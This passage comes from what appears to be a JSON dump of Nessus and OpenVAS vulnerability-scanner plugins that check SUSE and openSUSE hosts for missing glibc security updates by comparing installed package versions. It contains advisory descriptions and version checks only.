script_cvs_date(\"Date: 2019/01/02 16:37:56\");\n\n script_cve_id(\"CVE-2014-0475\", \"CVE-2014-5119\", \"CVE-2014-6040\");\n script_bugtraq_id(68505, 68983, 69472);\n\n script_name(english:\"openSUSE Security Update : glibc (openSUSE-SU-2014:1115-1)\");\n script_summary(english:\"Check for the openSUSE-2014-536 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"glibc was updated to fix three security issues :\n\n - A directory traversal in locale environment handling was\n fixed (CVE-2014-0475, bnc#887022, GLIBC BZ #17137)\n\n - Disable gconv transliteration module loading which could\n be used for code execution (CVE-2014-5119, bnc#892073,\n GLIBC BZ #17187)\n\n - Fix crashes on invalid input in IBM gconv modules\n (CVE-2014-6040, bnc#894553, BZ #17325)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=887022\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=892073\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=894553\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-09/msg00017.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-devel-static-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-info\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-locale\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-locale-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-locale-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-locale-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-obsolete\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-obsolete-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-profile-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:glibc-utils-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:nscd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3|SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3 / 13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-debuginfo-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-debugsource-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-devel-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-devel-debuginfo-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-devel-static-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-extra-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-extra-debuginfo-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-html-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-i18ndata-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-info-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-locale-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-locale-debuginfo-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-obsolete-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-obsolete-debuginfo-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-profile-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-utils-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-utils-debuginfo-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"glibc-utils-debugsource-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"nscd-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"nscd-debuginfo-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"glibc-32bit-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"glibc-debuginfo-32bit-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"glibc-devel-debuginfo-32bit-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"glibc-devel-static-32bit-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"glibc-locale-debuginfo-32bit-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"glibc-utils-32bit-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"glibc-utils-debuginfo-32bit-2.17-4.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-debuginfo-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-debugsource-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-devel-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-devel-debuginfo-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-devel-static-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-extra-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-extra-debuginfo-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-html-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-i18ndata-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-info-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-locale-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-locale-debuginfo-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-obsolete-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-obsolete-debuginfo-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-profile-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-utils-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-utils-debuginfo-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"glibc-utils-debugsource-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"nscd-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", reference:\"nscd-debuginfo-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-32bit-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-debuginfo-32bit-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-devel-debuginfo-32bit-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-devel-static-32bit-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-locale-debuginfo-32bit-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-utils-32bit-2.18-4.21.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.1\", cpu:\"x86_64\", reference:\"glibc-utils-debuginfo-32bit-2.18-4.21.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-03T12:18:13", "bulletinFamily": "scanner", "description": "This glibc update fixes a critical privilege escalation problem and\nthe following security and non-security issues :\n\n - bnc#892073: An off-by-one error leading to a heap-based\n buffer overflow was found in __gconv_translit_find(). An\n exploit that targets the problem is publicly available.\n (CVE-2014-5119)\n\n - bnc#882600: Copy filename argument in\n posix_spawn_file_actions_addopen. (CVE-2014-4043)\n\n - bnc#860501: Use O_LARGEFILE for utmp file.\n\n - bnc#842291: Fix typo in\n glibc-2.5-dlopen-lookup-race.diff.\n\n - bnc#839870: Fix integer overflows in malloc.\n (CVE-2013-4332)\n\n - bnc#834594: Fix readdir_r with long file names.\n (CVE-2013-4237)\n\n - bnc#824639: Drop lock before calling malloc_printerr.\n\n - bnc#801246: Fix buffer overrun in regexp matcher.\n (CVE-2013-0242)\n\n - bnc#779320: Fix buffer overflow in strcoll.\n (CVE-2012-4412)\n\n - bnc#894556 / bnc#894553: Fix crashes on invalid input in\n IBM gconv modules. (CVE-2014-6040, CVE-2012-6656,\n bnc#894553, bnc#894556, BZ#17325, BZ#14134)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-11-02T00:00:00", "id": "SUSE_SU-2014-1128-1.NASL", "href": "https://www.tenable.com/plugins/nessus/83638", "published": "2015-05-20T00:00:00", "title": "SUSE SLES10 Security Update : glibc (SUSE-SU-2014:1128-1)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2014:1128-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(83638);\n script_version(\"2.11\");\n script_cvs_date(\"Date: 2019/09/11 11:22:11\");\n\n script_cve_id(\"CVE-2012-4412\", \"CVE-2012-6656\", \"CVE-2013-0242\", \"CVE-2013-4237\", \"CVE-2013-4332\", \"CVE-2014-4043\", \"CVE-2014-5119\", \"CVE-2014-6040\");\n script_bugtraq_id(55462, 57638, 61729, 62324, 68006, 68983, 69470, 69472, 69738);\n\n script_name(english:\"SUSE SLES10 Security Update : glibc (SUSE-SU-2014:1128-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This glibc update fixes a critical privilege escalation problem and\nthe following security and non-security issues :\n\n - bnc#892073: An off-by-one error leading to a heap-based\n buffer overflow was found in __gconv_translit_find(). An\n exploit that targets the problem is publicly available.\n (CVE-2014-5119)\n\n - bnc#882600: Copy filename argument in\n posix_spawn_file_actions_addopen. (CVE-2014-4043)\n\n - bnc#860501: Use O_LARGEFILE for utmp file.\n\n - bnc#842291: Fix typo in\n glibc-2.5-dlopen-lookup-race.diff.\n\n - bnc#839870: Fix integer overflows in malloc.\n (CVE-2013-4332)\n\n - bnc#834594: Fix readdir_r with long file names.\n (CVE-2013-4237)\n\n - bnc#824639: Drop lock before calling malloc_printerr.\n\n - bnc#801246: Fix buffer overrun in regexp matcher.\n (CVE-2013-0242)\n\n - bnc#779320: Fix buffer overflow in strcoll.\n (CVE-2012-4412)\n\n - bnc#894556 / bnc#894553: Fix crashes on invalid input in\n IBM gconv modules. (CVE-2014-6040, CVE-2012-6656,\n bnc#894553, bnc#894556, BZ#17325, BZ#14134)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=779320\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=801246\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=824639\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=834594\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=839870\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=842291\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=860501\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=882600\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=892073\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=894553\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=894556\"\n );\n # https://download.suse.com/patch/finder/?keywords=190862be14e3ed91b361e0b0a66e292a\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?9d2f2bff\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2012-4412/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2013-0242/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2013-4237/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2013-4332/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-4043/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-5119/\"\n );\n # https://www.suse.com/support/update/announcement/2014/suse-su-20141128-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e04549f0\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected glibc packages\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-html\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-i18ndata\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-info\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-locale\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:glibc-profile\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:10\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/05/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES10)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES10\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES10\" && (! preg(pattern:\"^(3)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES10 SP3\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES10\", sp:\"3\", cpu:\"x86_64\", reference:\"glibc-32bit-2.4-31.77.112.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"3\", cpu:\"x86_64\", reference:\"glibc-devel-32bit-2.4-31.77.112.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"3\", cpu:\"x86_64\", reference:\"glibc-locale-32bit-2.4-31.77.112.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"3\", cpu:\"x86_64\", reference:\"glibc-profile-32bit-2.4-31.77.112.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"3\", cpu:\"s390x\", reference:\"glibc-32bit-2.4-31.77.112.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"3\", cpu:\"s390x\", reference:\"glibc-devel-32bit-2.4-31.77.112.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"3\", cpu:\"s390x\", reference:\"glibc-locale-32bit-2.4-31.77.112.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"3\", cpu:\"s390x\", reference:\"glibc-profile-32bit-2.4-31.77.112.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"3\", reference:\"glibc-2.4-31.77.112.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"3\", reference:\"glibc-devel-2.4-31.77.112.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"3\", reference:\"glibc-html-2.4-31.77.112.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"3\", reference:\"glibc-i18ndata-2.4-31.77.112.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"3\", reference:\"glibc-info-2.4-31.77.112.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"3\", reference:\"glibc-locale-2.4-31.77.112.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"3\", reference:\"glibc-profile-2.4-31.77.112.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:\"3\", reference:\"nscd-2.4-31.77.112.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-29T18:36:21", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-16T00:00:00", "published": "2015-10-16T00:00:00", "id": "OPENVAS:1361412562310851101", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851101", "title": "SuSE Update for glibc SUSE-SU-2014:1129-1 (glibc)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2014_1129_1.nasl 12381 2018-11-16 11:16:30Z cfischer $\n#\n# SuSE Update for glibc SUSE-SU-2014:1129-1 (glibc)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851101\");\n script_version(\"$Revision: 12381 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-16 12:16:30 +0100 (Fri, 16 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-10-16 20:03:09 +0200 (Fri, 16 Oct 2015)\");\n script_cve_id(\"CVE-2012-6656\", \"CVE-2013-4357\", \"CVE-2014-5119\", \"CVE-2014-6040\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"SuSE Update for glibc SUSE-SU-2014:1129-1 (glibc)\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glibc'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"This glibc update fixes a critical privilege escalation problem and two\n additional issues:\n\n * bnc#892073: An off-by-one error leading to a heap-based buffer\n overflow was found in __gconv_translit_find(). An exploit that\n targets the problem is publicly available. (CVE-2014-5119)\n\n * bnc#836746: Avoid race between {, __de}allocate_stack and\n __reclaim_stacks during fork.\n\n * bnc#844309: Fixed various overflows, reading large /etc/hosts or\n long names. (CVE-2013-4357)\n\n * bnc#894553, bnc#894556: Fixed various crashes on invalid input in\n IBM gconv modules. (CVE-2014-6040, CVE-2012-6656)\");\n\n script_tag(name:\"affected\", value:\"glibc on SUSE Linux Enterprise Server 11 SP2 LTSS\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_xref(name:\"SUSE-SU\", value:\"2014:1129_1\");\n script_tag(name:\"solution_type\", 